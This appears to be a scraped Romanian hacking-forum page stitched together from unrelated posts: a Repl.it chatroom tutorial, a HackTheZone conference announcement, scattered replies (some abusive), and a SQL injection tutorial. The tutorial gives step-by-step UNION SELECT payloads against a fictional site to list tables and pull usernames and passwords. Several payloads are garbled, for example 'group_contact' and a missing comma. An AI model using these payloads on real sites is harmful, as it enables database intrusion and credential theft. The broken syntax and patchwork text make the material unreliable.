Leaderboard

Salut, in acest tutorial o sa arat cum putem face un ChatRoom (Cu tot cu host). Pasul 1 - Ne facem cont pe Repl.It (Ne putem loga si cu gmail). Eu am un cont facut special pentru tutoriale pe acest forum. Link: https://repl.it/ Pasul 2 - Facem un repl de Nodejs si il numim "server" (sau ce nume vrem). Pasul 3 - Pe langa index.js facem 2 fisiere numite: package-lock.json; package.json. Pasul 4 - In index.js copypaste la urmatorul cod: https://pastebin.com/pfNEcACv Pasul 5 - In package-lock.json copypaste la urmatorul cod: https://pastebin.com/2dRvEwvt Pasul 6 - In package.json copypaste la urmatorul cod: https://pastebin.com/Fjg073BQ Pasul 7 - Dam run la repl-u' nostru, asteptam sa instaleze tot ce e de instalat si dupa ce termina copiam linku' de la repl-u' nostru (o sa avem nevoie de el mai tarziu): Pasul 8 - Mai facem un repl de nodejs si il numim "ChatRoom" (sau ce nume vrem). Pasul 9 - Pe langa index.js facem 2 fisiere numite: package-lock.json; package.json. Pasul 10 - In index.js copypaste la urmatorul cod: https://pastebin.com/a5j9MPNa Pe linia de cod 4 unde scrie: var socket = io("Link"); in loc de "link" punem link-u' de la repl-u' ce-l facusem inainte. (Repl-u' cu numele server sau ce nume a-ti pus). Pasul 11 - In package-lock.json copypaste la urmatorul cod: https://pastebin.com/sABUuGCB Pasul 12 - In package.json copypaste la urmatorul cod: https://pastebin.com/xtgv9pMr GATA DAM RUN SI DESCHIDEM LINK-U DE LA REPL-U' "CHATROOM" SAU CUM L-ATI NUMIT. SI IL DAM PERSOANEI CU CARE VREM SA COMUNICAM PE ACEL CHATROOM LINK DE LA CHATROOM-UL CE L-AM FACUT PENTRU ACEST TUTORIAL: https://chatroom.tutorialerepl.repl.run/

Ai explicat fain,Felicitari si bine ai venit.Incearca sa postezi ceva continut mai ok si nineni nu o sa mai zica nimic.BAFTA!

Sa zicem ca aveti un site din programul "Big Bounty" si vreti sa incercati un atac MYSQL. Eu am sa pun urmatorul site fictional: https://victimescu.com/index.php?id=5 Pentru a verifica daca site-ul nostru da o eroare Sql trebuie sa punem dupa parametrul .php?.id=5 semnul ('). Daca acesta este vulnerabil va scrie urmatoarea chestie: You have an error in your SQL syntax; check the manual that corresponds to your….. Continued Daca acesta nu este vulnerabil, site-ul nostru va functiona normal. In continuare trebuie sa mergem cu parametrul (ORDER BY ) ca in pasul de mai sus. - Acesta este folosit pentru a verifica cate coloane se afla pe pagina respectiva in baza de date mySQL. https://victimescu.com/index.php?id=5 ORDER BY 5 - Daca pagina noastra functioneaza perfect normal inseamna ca sunt prezente mai mult de 5 coloane in baza de date. Incercam sa marim numarul cu 10. https://victimescu.com/index.php?id=1 ORDER BY 15- Sa zicem ca acum ne va aparea eroarea care ne indica numarul de coloane prezente. Unknown column ’10’ in ‘order clause’Unknown column ’10’ in ‘order clause’ Sa zicem ca pe site-ul nostru fictional avem prezente 9 coloane. Acum continuam doar cu parametrul (UNION SELECT). https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9 In continuare trebuie sa apara 2 numere care indica unde facem injectarea. ------------------------------------------------- Un numar din cele 2 va fi boldit. ------------------------------------------------- Sa zicem ca cele 2 numere sunt 5 si 3 iar cel care ne indica baza de date sau coloana unde trebuie facuta injectarea este 5. https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (table_name),6,7 from information_schema.tables Aceasta comanda ne ajuta sa vedem ce se afla in aceasta baza de date. CHARACTER_SETS,CLIENT_STATISTICS,COLUMNS In continuare pentru a extrage mai multe chestii scriem urmatoarea comanda: https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact (column_name),6,7 from information_schema.columns where table_schema=database()- in continuare o sa ne apara: -useri -parole -email-uri -etc https://victimescu.com/index.php?id=5 UNION SELECT 1,2,3,4 group_contact(username,0x3a,password),67 from database- Aceasta comanda a fost folosita pentru a afla parola de la panel. ------------------------------------------------- Deseori parola va fi in format MD5 ------------------------------------------------- Acesta a fost tutorialul si sper sa fie folosit in scopuri bune.

Salutare all, In curand lansam acesta conferinta in Bucuresti, 17-18 Octombrie. HTZ pune accent foarte mare pe Ethical Hacking, iar dupa cum stim din ce in ce mai des apar incidente majore in industrie (data breaches or damage). Noi ne deosebim fata de alte conferinte prin challenge-urile de pen-testing, facute in totalitate de staff-ul nostru. Prin aceste challenge-uri va punem la incercare creativitatea si totodata skill-urile voastre de: pen-testing, scripting, social engineering, crypto si multe altele. Scopul nostru este va aruncam in mijlocul actiunii, sa ne indepartam putin de platformele online, sa interactionam mai mult face to face, sa ne cunoastem si altfel ... nu doar dupa NickName :). Challenge-urile incep in data de 11-12 Octombrie si o sa fie nevoie de deplasare prin Bucuresti, in diferite Geo Locations pentru a finaliza challenge-urile. Fiecare challenge te va ghida catre alt challenge! Evident, exista niste reguli pentru aceste challenge-uri, aceste reguli se regasesc pe website-ul nostru https://www.hackthezone.com/tickets/rules-and-tactics . La finalul acestor challenge-uri, ne vedem cu totii la conferinta din data de 17-18 Octombrie, in Crystal Palace Ballrooms, Calea Rahovei 198A, Sector 5. Da, o sa fim si noi pe scena sa va prezentam fiecare challenge cum trebuia rezolvat (walkthrough scenarios) si decernarea premiului. Premiul este luat de o singura persoana, the best of the best! Poti sa participi si cu echipa. Nu este nici o problema, dar tot cel mai bun timp facut de o persoana o sa fie premiat :D la final ... va impartiti voi premiul. La conferinta o sa avem mai speakers de top ce vor ilustra diferinte puncte de vedere despre IT Security, cum evolueaza atacatorii, cum am putea sa ne aparam mai bine si nu numai. Biletele pot fi achizitionate de aici : https://www.iabilet.ro/bilete-hackthezone-conference-challenges-43985 Website-ul nostru o sa fie in permanentat actualizat, iar mici detalii pot fie modificate sau imbunatatite. Pentru intrebari sau nelamuriri, puteti sa ne gasiti si pe canalul nostru de Slack la : https://www.hackthezone.com/slack . Have fun! AlexHTZ

Esti un terminat daca dupa ce ti-am dat downvote ai inceput sa creezi conturi sa imi dai downvote. Fa ceva cu viata ta

Aha, si package-lock.json ce face? Puneti ba mana si invatati ce fac tool-urile pe care le folositi. Voi chiar puteti sa fiti multumiti de voi in halul asta?

Nu mai bine iti vezi tu de viata si te opresti in a-ti share-ui ideile ?

Dar mai pe scurt package.json ofera o varianta ez de a "urmări" pachetele care sunt utilizate în aplicație/program. " { "main": "index.js", "dependencies": { "socket.io-client": "2.1.1", "chalk": "2.4.1", "prompts": "1.2.0" } } " wow

de ce a traversat gaina strada ?

E un tepar

Ce ai fumat acolo?

list3[2][2] = 'goodbye'

i l-am facut si eu azi noapte. A disparut subit cu codul

dap, greseala mea

Iti trimit pm.

Absolut

De ce nu stergeti si voi threadurile astea sa nu mai vina lumea sa cerseasca?

Hacker adevarat